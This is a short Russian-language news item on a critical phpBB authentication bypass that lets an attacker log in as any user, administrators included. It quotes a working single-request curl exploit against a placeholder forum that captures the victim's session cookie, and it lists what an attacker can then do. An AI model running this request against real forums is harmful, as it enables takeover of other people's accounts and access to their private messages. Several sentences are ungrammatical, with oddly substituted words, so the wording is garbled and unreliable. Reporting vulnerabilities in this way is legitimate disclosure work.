Обнаружена критическая уязвимость в phpBB, позволяющая войти в учётную запись любого пользователя

Организация Aikido Security, работающая в сфере кибербезопасности, сообщила о критической уязвимости в phpBB — популярном движке интернет-форумов.

Уязвимость, выявленная ИИ-утилитой Aikido Attack, позволяет полностью пропустить процедура авторизации и войти на форум под учётной записью любого пользователя, в том числе администратора.

Подробности пока не раскрываются, вопреки то, что исправление выпущено ещё 6 июня. Уязвимы все версии phpBB вплоть до 3.3.17, в которой проблема и была устранена. Владельцам крупных форумов отправлены оповещения.

Портал OpenNET приводит пример рабочего эксплоита:

 curl -i -s \ -c cookies.txt \ -b cookies.txt \ -u 'admin:anything' \ -d 'login=Login&login_username=admin&login_password=anything' \ 'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

Эксплуатация сводится к отправке одного HTTP-запроса с указанием логина жертвы. В файле cookies.txt окажется сессионная кука, которую злоумышленник подставит в свой браузер.

С правами обычного пользователя атакующий может ознакомиться личные сообщения пользователя и отправлять посты от имени жертвы. С учётной записью администратора возможности гораздо шире: можно править и удалять чужие посты, удалять учётные записи, а равным образом видеть IP-адреса пользователей. Тем не менее, атакующий не сможет зайти в панель администрирования (чтобы, например, удалённо выполнить произвольный исходник на сервере), поскольку для этого потребуется ввести пароль, которого он не знает.